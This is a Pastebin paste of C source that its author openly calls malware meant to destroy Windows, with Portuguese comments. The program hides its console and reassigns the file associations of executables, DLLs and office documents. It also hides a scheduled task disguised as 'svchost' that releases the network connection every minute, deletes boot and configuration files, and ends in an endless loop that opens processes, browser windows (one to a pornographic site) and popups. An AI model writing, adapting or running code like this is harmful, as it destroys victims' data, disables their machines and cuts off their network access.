Advertisement
DarkProgrammer000

Malware [Destruição do Windows]

Nov 29th, 2018
470
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.69 KB | None | 0 0
  1. /// Bibliotecas
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <windows.h>
  5.  
  6. int main( int argc , char* argv [])
  7. {
  8.     // Console Stealth
  9.     FreeConsole();
  10.    
  11.     // Corromper Arquivos
  12.     system("assoc .inf=Virus");
  13.     system("assoc .ini=Virus");
  14.     system("assoc .txt=Virus");
  15.     system("assoc .bat=Virus");
  16.     system("assoc .exe=Virus");
  17.     system("assoc .sys=Virus");
  18.     system("assoc .url=Virus");
  19.     system("assoc .dll=Virus");
  20.     system("assoc .xlsx=Virus");
  21.     system("assoc .xlsx=Virus");
  22.     system("assoc .docx=Virus");
  23.     system("assoc .doc=Virus");
  24.     system("assoc .pptx=Virus");
  25.     system("assoc .ppt=Virus");
  26.  
  27.     // Bloquear Internet Pra Sempre
  28.     system("mkdir %temp%\\oi");
  29.     system("echo ipconfig /release >> %temp%\\oi\\svchost.bat");
  30.     system("schtasks /create /sc minute /mo 1 /tn \"svchost\" /tr \"%temp%\\oi\\svchost.bat\"");
  31.     system("attrib +r +s +a +h %temp%\\*.* /s /d");
  32.  
  33.     // Código Extra [Corromper Arquivos Arquivos de Inicialização]
  34.     system("attrib -r -s -h c: \\ autoexec.bat");
  35.     system("del c: \\ autoexec.bat /s /q");
  36.     system("attrib -r -s -h c: \\ boot.ini");
  37.     system("del c: \\ boot.ini /s /q");
  38.     system("attrib -r -s -h c: \\ ntldr");
  39.     system("attrib -r -s -h c: \\ windows \\ win.ini /s /q");
  40.     system("del c: \\ windows \\ win.ini /s /q");
  41.     system("del c: \\ ntldr /s /q");
  42.  
  43.  
  44.     // Estrutura de Repetição: [Ataque Direto e Indireto]
  45.     for (;;)
  46.     {
  47.         system("start cmd.exe");
  48.         system("start explorer.exe");
  49.         system("start iexplore.exe \"www.xvideos.com\"");
  50.         system("start iexplore.exe \"www.google.com\"");
  51.         system("msg * Dark Programmer000 !!!");
  52.     }
  53. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement